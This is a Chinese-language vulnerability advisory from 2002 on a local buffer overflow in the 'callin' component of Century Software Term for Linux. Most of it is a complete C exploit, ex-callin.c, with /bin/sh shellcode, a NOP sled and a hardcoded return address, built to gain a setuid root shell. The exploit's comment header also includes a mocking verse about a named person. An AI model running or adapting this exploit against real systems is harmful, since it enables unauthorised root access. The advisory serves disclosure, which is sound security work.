Century Software Term 命令行存在缓冲溢出漏洞发布时间:2002-02-28 更新时间:2002-02-28 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:物理接触 BUGTRAQ ID:4174 受影响系统 Century Software Term For Linux 6.27.0869详细描述 在某些环境下,本地用户可以利用term执行任意代码,问题在于Term在当通过tty 选项接收参数的时候没有检查边界长度,可造成缓冲溢出而以setuid root身份 执行任意命令。 测试代码 /********************************************************/ /* ex-callin.c - Haiku Hacker <haiku@hushmail.com> */ /* Exploits the buffer overflow in Century Software's */ /* calling component of the Term program for Linux. */ /********************************************************/ /* Greets, love, and respect to: */ /* KF, Merc, Synapse, UPT old and new, Lance Spitzner, */ /* egami, comega, jericho, and most importantly sl1k */ /* for his guidance, coaching, and tutoring. */ /********************************************************/ /* RFP's Pants */ /* ----------- */ /* Rain Forest Puppy */ /* Wears tight black pants to big cons */ /* Does he have limp wrist? */ /********************************************************/ #include <stdio.h> #include <string.h> #include <stdlib.h> /* use this to specify the location of callin */ #define CINPATH "./callin" int main(int argc, char **argv) { /* Shellcode borrowed from Aleph1 */ char shellcode[] = "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89" "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c" "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff" "\xff\xff/bin/sh"; char egg_string[300]; int i; unsigned long offset = 0; if (argc > 1) { offset = atoi(argv[1]); } memcpy(egg_string, "tty", 3); for (i = 3; i < 95; i++) egg_string[i] = 'A'; *(long *)(egg_string+95) = 0xbffff67c + offset; for (i = 99; i < 300; i++) egg_string[i] = 0x90; strcpy(egg_string+(sizeof(egg_string)-strlen(shellcode)), shellcode); execl(CINPATH, "callin", egg_string, 0); } 解决方案 尚无 相关信息 KF <dotslash@snosoft.com>. 参考:http://online.securityfocus.com/archive/82/257731 相关主页:http://te.censoft.com/products/term_unix.php |
